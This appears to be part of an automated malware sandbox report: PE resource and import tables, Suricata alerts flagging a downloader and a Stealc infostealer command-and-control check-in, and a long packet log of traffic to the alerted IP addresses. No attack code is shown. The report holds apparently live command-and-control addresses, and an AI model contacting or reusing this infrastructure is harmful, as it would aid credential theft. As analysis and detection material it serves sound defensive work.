RT_ICON	0x42fe40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Syriac	Syriac	0.591589861751152
RT_ICON	0x430508	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Syriac	Syriac	0.6163294797687862
RT_ICON	0x430a70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Syriac	Syriac	0.3578799249530957
RT_ICON	0x431b18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Syriac	Syriac	0.35081967213114756
RT_ICON	0x4324a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Syriac	Syriac	0.40425531914893614
RT_ICON	0x432970	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Syriac	Syriac	0.8278251599147122
RT_ICON	0x433818	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Syriac	Syriac	0.8330324909747292
RT_ICON	0x4340c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Syriac	Syriac	0.7995391705069125
RT_ICON	0x434788	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Syriac	Syriac	0.7088150289017341
RT_ICON	0x434cf0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Syriac	Syriac	0.803941908713693
RT_ICON	0x437298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Syriac	Syriac	0.8325515947467167
RT_ICON	0x438340	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Syriac	Syriac	0.8422131147540983
RT_ICON	0x438cc8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Syriac	Syriac	0.8625886524822695
RT_DIALOG	0x43c920	0x84	data			0.7651515151515151
RT_STRING	0x43c9a8	0x2f4	data			0.4894179894179894
RT_STRING	0x43cca0	0xde	data			0.5585585585585585
RT_STRING	0x43cd80	0x708	data			0.4261111111111111
RT_STRING	0x43d488	0x6bc	data			0.4361948955916473
RT_STRING	0x43db48	0x808	data			0.4173151750972763
RT_STRING	0x43e350	0x512	data			0.44684129429892144
RT_STRING	0x43e868	0x78a	data			0.42383419689119173
RT_STRING	0x43eff8	0x5b4	data			0.44931506849315067
RT_STRING	0x43f5b0	0x718	data			0.42566079295154186
RT_GROUP_CURSOR	0x43b880	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x43c750	0x14	data			1.25
RT_GROUP_ICON	0x439130	0x76	data	Syriac	Syriac	0.6779661016949152
RT_GROUP_ICON	0x432908	0x68	data	Syriac	Syriac	0.7115384615384616
RT_VERSION	0x43c768	0x1b8	COM executable for DOS			0.5681818181818182

Imports

DLL

Import

KERNEL32.dll

GetFileSize, SetDefaultCommConfigA, WriteConsoleOutputCharacterW, UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, Process32First, SetComputerNameW, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, GlobalAlloc, GetConsoleAliasExesLengthW, WriteConsoleOutputA, GetFileAttributesA, GetTimeFormatW, GetConsoleAliasW, GetModuleFileNameW, SetLastError, GetProcAddress, SetFileAttributesA, GetAtomNameA, LoadLibraryA, RegisterWaitForSingleObject, AddAtomA, FoldStringW, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, GetVersionExA, WriteProcessMemory, LCMapStringW, LCMapStringA, GetLastError, HeapFree, HeapAlloc, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW

USER32.dll

GetClassLongW, GetMonitorInfoW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Syriac	Syriac

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T17:42:07.594849+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49699	104.21.56.70	443	TCP
2024-12-10T17:42:09.220979+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49700	176.113.115.19	80	TCP
2024-12-10T17:42:14.485107+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49702	92.255.57.89	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 17:42:05.566767931 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:05.566796064 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:05.566870928 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:05.593843937 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:05.593861103 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:06.847906113 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:06.848050117 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.026884079 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.026912928 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.027292967 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.027350903 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.036418915 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.083333969 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.594865084 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.594927073 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.594963074 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.594976902 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.595000982 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.595019102 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.632479906 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.632514000 CET	443	49699	104.21.56.70	192.168.2.7
Dec 10, 2024 17:42:07.632527113 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.632581949 CET	49699	443	192.168.2.7	104.21.56.70
Dec 10, 2024 17:42:07.747056007 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:07.867378950 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:07.867491961 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:07.867661953 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:07.986968994 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.220897913 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.220978975 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.221033096 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.221045971 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.221127987 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.221127987 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.221437931 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.221450090 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.221462965 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.221502066 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.221517086 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.221983910 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.222037077 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.222048044 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.222060919 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.222074032 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.222101927 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.222158909 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.340455055 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.340558052 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.340564966 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.340629101 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.413789034 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.413881063 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.414153099 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.414213896 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.417805910 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.417870998 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.417952061 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.418019056 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.426304102 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.426387072 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.426428080 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.426554918 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.434638977 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.434706926 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.434721947 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.434771061 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.442965031 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.443047047 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.443082094 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.443131924 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.451373100 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.451462030 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.451514006 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.451601982 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.459719896 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.459788084 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.459851027 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.459975004 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.468101025 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.468167067 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.468180895 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.468266964 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.476464987 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.476526976 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.476553917 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.476614952 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.484853029 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.484905958 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.484949112 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.485001087 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.492572069 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.492646933 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.492754936 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.492944002 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.539539099 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.539623976 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.539733887 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.606040955 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.606129885 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.606144905 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.606206894 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.608340979 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.608413935 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.609306097 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.609361887 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.609441042 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.609497070 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.614392042 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.614434004 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.614459038 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.614496946 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.619411945 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.619498968 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.619505882 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.619548082 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.624517918 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.624564886 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.624605894 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.624619961 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.629334927 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.629390001 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.629419088 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.629467010 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.634238958 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.634371996 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.634432077 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.639082909 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.639163017 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.639163017 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.639230013 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.643845081 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.643960953 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.644040108 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.644098997 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.648696899 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.648750067 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.648757935 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.648799896 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.655399084 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.655416965 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.655484915 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.658948898 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.658998013 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.659123898 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.659173012 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.663832903 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.663891077 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.663980007 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.664020061 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.669030905 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.669187069 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.669301987 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.673456907 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.673477888 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.673576117 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.677056074 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.677156925 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.677233934 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.677306890 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.681082964 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.681472063 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.798398972 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.798417091 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.798561096 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.799571037 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.799619913 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.800133944 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.800184965 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.802690983 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.802736044 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.803576946 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.803621054 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.803626060 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.803738117 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.806786060 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.806809902 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.806842089 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.806855917 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.809587955 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.809602976 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.809708118 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.812335968 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.812418938 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.812455893 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.812519073 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.816355944 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.816374063 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.816435099 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.818558931 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.818572044 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.818618059 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.822077990 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.822196960 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.822273016 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.824217081 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.824295998 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.824335098 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.824381113 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.827699900 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.827713966 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.827769995 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.831176043 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.831191063 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.831291914 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.831291914 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.832798958 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.833424091 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.833425999 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.833494902 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.836318970 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.836339951 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.836394072 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.836411953 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.840637922 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.840670109 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.840703964 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.840734959 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.841490030 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.841566086 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.841619968 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.846023083 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.846035957 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.846107960 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.848953962 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.849013090 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.849132061 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.849184036 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.850191116 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.850301981 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.850369930 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.853836060 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.854357958 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.854742050 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.854799032 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.857083082 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.857100010 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.857167006 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.860692024 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.861171007 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.861236095 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.862792969 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.862806082 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.862900972 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.865751028 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.865763903 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.865819931 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.868638039 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.868695974 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.868803978 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.868859053 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.871984959 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.872172117 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.872251987 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.990648985 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.990767956 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.990833044 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.992084026 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.992146969 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.992163897 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.992214918 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.994471073 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.994601965 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.994669914 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.997082949 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.997138977 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.997168064 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.997215986 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:09.999736071 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.999895096 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:09.999944925 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.002253056 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.002304077 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.002342939 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.002397060 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.004780054 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.004910946 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.004970074 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.007209063 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.007333994 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.007401943 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.009713888 CET	80	49700	176.113.115.19	192.168.2.7
